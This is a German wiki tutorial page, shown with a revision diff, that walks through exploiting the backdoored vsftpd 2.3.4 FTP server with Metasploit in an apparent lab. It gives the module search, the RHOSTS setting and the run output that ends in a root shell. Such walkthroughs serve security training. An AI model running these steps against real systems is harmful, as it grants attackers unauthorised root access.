Metasploit vsftp exploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
Zeile 22: Zeile 22:
 
=Und Attacke=
 
=Und Attacke=
 
*msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
 
*msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
 
+
<pre>
 
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
 
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
 
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
 
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
Zeile 28: Zeile 28:
 
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
 
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
 
[*] Found shell.
 
[*] Found shell.
 +
</pre>
 
;Wir haben kein Prompt aber eine Shell
 
;Wir haben kein Prompt aber eine Shell

Aktuelle Version vom 19. Oktober 2022, 16:08 Uhr

Gefundene Version

[*] Nmap: 21/tcp open ftp vsftpd 2.3.4

Gibt es eingebaute Schwachstellen zum vsftp Server?

  • msf6 > search vsftp
Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Module laden

  • msf6 > use 0

info

  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info

Wir müssen den RHOST setzen

  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.10.105

Und Attacke

  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
[+] 10.0.10.105:21 - Backdoor service has been spawned, handling...
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
Wir haben kein Prompt aber eine Shell